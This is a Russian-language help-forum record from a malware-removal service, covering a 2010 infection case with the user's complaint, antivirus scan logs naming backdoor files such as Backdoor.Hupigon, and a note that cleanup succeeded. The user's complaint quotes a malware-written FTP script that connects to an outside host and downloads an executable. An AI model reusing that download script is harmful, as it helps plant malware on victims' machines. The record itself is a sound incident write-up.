При загрузке системы загружается вирус с интернета. (заявка №30803)

Пользователь обратился [URL=http://virusinfo.info/911test]в сервис 911[/URL], указав на следующие проблемы в работе его компьютера:
При загрузке появляется окно cmd, который грузит вирус с какого-то FTP. Удаляется вирус только перезагрузкой, но в момент перезагрузки снова загружается и т.д. В папке C:\Documents and Settings\Админ создается файл cmd.txt с текстом

open shadao.3322.org
test
test
binary
get 1.exe
bye

при его удалении создается снова. откуда он загружается я не нашел. Заранее спасибо.
Дата обращения: 01.10.2010 9:05:34
Номер заявки: [URL=http://virusinfo.info/911test/?action=case_show_directions&case_id=30803]30803[/URL]

[B]04.10.2010 10:10:06[/B] на зараженном компьютере были обнаружены следующие вредоносные файлы:
[LIST=1][*] [B]C:\windows\system32\cmd.exe[/B] - подозрительный, обрабатывается вирлабом
[LIST][*] размер: 396288 байт[*] дата файла: 14.04.2008 20:10:52[*] версия: "5.1.2600.5512 (xpsp.080413-2111)"[*] копирайты: "© Корпорация Майкрософт. Все права защищены."[/LIST][/LIST]

[B]04.10.2010 13:50:11[/B] на зараженном компьютере были обнаружены следующие вредоносные файлы:
[LIST=1][*] [B]C:\windows\system32\cmd.exe[/B] - подозрительный, обрабатывается вирлабом
[LIST][*] размер: 396288 байт[*] дата файла: 14.04.2008 20:10:52[*] версия: "5.1.2600.5512 (xpsp.080413-2111)"[*] копирайты: "© Корпорация Майкрософт. Все права защищены."[/LIST][/LIST]

[B]04.10.2010 20:20:09[/B] на зараженном компьютере были обнаружены следующие вредоносные файлы:
[LIST=1][*] [B]C:\windows\system32\cmd.exe[/B] - подозрительный, обрабатывается вирлабом
[LIST][*] размер: 396288 байт[*] дата файла: 14.04.2008 20:10:52[*] версия: "5.1.2600.5512 (xpsp.080413-2111)"[*] копирайты: "© Корпорация Майкрософт. Все права защищены."[/LIST][*] [B]C:\Program Files\TMeter\trafmonitor.exe[/B] - подозрительный, обрабатывается вирлабом
[LIST][*] размер: 212992 байт[*] дата файла: 27.01.2010 11:44:48[*] версия: "10,0,553,0"[*] копирайты: "Copyright (c) 2010"[/LIST][*] [B]C:\Program Files\TMeter\TrafSvc.exe[/B] - подозрительный, обрабатывается вирлабом
[LIST][*] размер: 430080 байт[*] дата файла: 27.01.2010 11:44:24[*] версия: "10, 0, 553, 0"[*] копирайты: "Copyright (c) 2010 Alexey Kazakovsky"[/LIST][*] [B]C:\WINDOWS\system32\DrvMon.exe[/B] - подозрительный, обрабатывается вирлабом
[LIST][*] размер: 53248 байт[*] дата файла: 16.10.2008 6:14:00[*] версия: "1, 0, 1, 2"[*] копирайты: "Copyright c 2003 Alcor Micro, Corp."[/LIST][*] [B]C:\WINDOWS\system32\ADMDLL.dll[/B] - [URL=http://www.securelist.com/ru/find?words=not-a-virus:RemoteAdmin.Win32.RAdmin.20]not-a-virus:RemoteAdmin.Win32.RAdmin.20[/URL]
[LIST][*] размер: 90112 байт[*] дата файла: 05.12.2001 13:27:56[*] детект других антивирусов: DrWEB 5.0: Зловред Program.RemoteAdmin.349[/LIST][/LIST]

[B]07.10.2010 21:20:27[/B] на зараженном компьютере были обнаружены следующие вредоносные файлы:
[LIST=1][*] [B]C:\WINDOWS\system32\muicon.exe[/B] - подозрительный, обрабатывается вирлабом
[LIST][*] размер: 287256 байт[*] дата файла: 30.04.2010 7:58:34[*] детект других антивирусов: VBA32: Зловред Backdoor.Hupigon.lsou; BitDefender: Зловред Backdoor.Generic.343439; Avast4: Зловред Win32:Malware-gen[/LIST][*] [B]C:\Documents and Settings\Админ\scvhost.exe[/B] - подозрительный, обрабатывается вирлабом
[LIST][*] размер: 2781 байт[*] дата файла: 19.12.2008 14:58:14[/LIST][*] [B]C:\WINDOWS\system32\muicon.exe[/B] - подозрительный, обрабатывается вирлабом
[LIST][*] размер: 287256 байт[*] детект других антивирусов: VBA32: Зловред Backdoor.Hupigon.lsou; BitDefender: Зловред Backdoor.Generic.343439; Avast4: Зловред Win32:Malware-gen[/LIST][*] [B]C:\RECYCLER\recyl.exe[/B] - подозрительный, обрабатывается вирлабом
[LIST][*] размер: 396288 байт[*] версия: "5.1.2600.5512 (xpsp.080413-2111)"[*] копирайты: "© Корпорация Майкрософт. Все права защищены."[/LIST][*] [B]C:\WINDOWS\system32\p.exe[/B] - подозрительный, обрабатывается вирлабом
[LIST][*] размер: 45056 байт[*] версия: "5.1.2600.5512 (xpsp.080413-0852)"[*] копирайты: "© Корпорация Майкрософт. Все права защищены."[/LIST][*] [B]C:\Documents and Settings\Админ\scvhost.exe[/B] - подозрительный, обрабатывается вирлабом
[LIST][*] размер: 2781 байт[/LIST][*] [B]C:\WINDOWS\system32\muicon.exe[/B] - подозрительный, обрабатывается вирлабом
[LIST][*] размер: 287256 байт[*] детект других антивирусов: VBA32: Зловред Backdoor.Hupigon.lsou; BitDefender: Зловред Backdoor.Generic.343439; Avast4: Зловред Win32:Malware-gen[/LIST][*] [B]C:\WINDOWS\system32\muicon.exe[/B] - подозрительный, обрабатывается вирлабом
[LIST][*] размер: 287256 байт[*] детект других антивирусов: VBA32: Зловред Backdoor.Hupigon.lsou; BitDefender: Зловред Backdoor.Generic.343439; Avast4: Зловред Win32:Malware-gen[/LIST][*] [B]C:\RECYCLER\recyl.exe[/B] - подозрительный, обрабатывается вирлабом
[LIST][*] размер: 396288 байт[*] версия: "5.1.2600.5512 (xpsp.080413-2111)"[*] копирайты: "© Корпорация Майкрософт. Все права защищены."[/LIST][*] [B]C:\RECYCLER\recyl.exe[/B] - подозрительный, обрабатывается вирлабом
[LIST][*] размер: 396288 байт[*] версия: "5.1.2600.5512 (xpsp.080413-2111)"[*] копирайты: "© Корпорация Майкрософт. Все права защищены."[/LIST][*] [B]C:\WINDOWS\system32\p.exe[/B] - подозрительный, обрабатывается вирлабом
[LIST][*] размер: 45056 байт[*] версия: "5.1.2600.5512 (xpsp.080413-0852)"[*] копирайты: "© Корпорация Майкрософт. Все права защищены."[/LIST][*] [B]C:\WINDOWS\system32\p.exe[/B] - подозрительный, обрабатывается вирлабом
[LIST][*] размер: 45056 байт[*] версия: "5.1.2600.5512 (xpsp.080413-0852)"[*] копирайты: "© Корпорация Майкрософт. Все права защищены."[/LIST][*] [B]C:\Documents and Settings\Админ\scvhost.exe[/B] - подозрительный, обрабатывается вирлабом
[LIST][*] размер: 2781 байт[/LIST][*] [B]C:\Documents and Settings\Админ\scvhost.exe[/B] - подозрительный, обрабатывается вирлабом
[LIST][*] размер: 2781 байт[/LIST][/LIST]

13.10.2010 9:42:41 лечение успешно завершено